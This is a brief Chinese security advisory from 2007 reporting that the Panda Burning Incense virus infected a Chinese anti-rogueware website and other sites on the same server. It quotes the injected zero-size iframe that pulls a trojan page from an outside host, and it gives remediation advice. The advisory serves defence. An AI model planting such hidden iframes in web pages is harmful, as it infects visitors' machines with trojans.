出处：DSW Avert 时间：2007年01月31日

今日，DSW Lab Avert小组监测到一个名为中国反流氓软件公益网的网站被挂熊猫烧香病毒，在网站页面中被插入<iframe src=http://www.krvkr.com/****.htm width=0 height=0></iframe>指令，可用来下载相关木马。同时发现同服务器的其它网站，也被挂熊猫烧香病毒。初步诊断认为该服务器感染了熊猫烧香病毒。

被挂马的页面截图：

同服务器的另外一个网站截图：

服务器被感染熊猫烧香病毒，危害更大。由于熊猫病毒的特性，会在*.htm *.html *.asp *.php *.js *.aspx文件中插入指令，服务器所有网页页面都将被作为传染源。DSW Lab Avert提醒广大网管，增大对服务器的保护力度。

三、解决方案：

1、推荐安装超级巡警监测查杀以上木马。
2、请广大用户及时升级系统补丁，预防更多的网站挂马攻击。
3、为了保障广大用户不受木马侵害，在事件解决前请暂时不要尝试访问该挂马网站。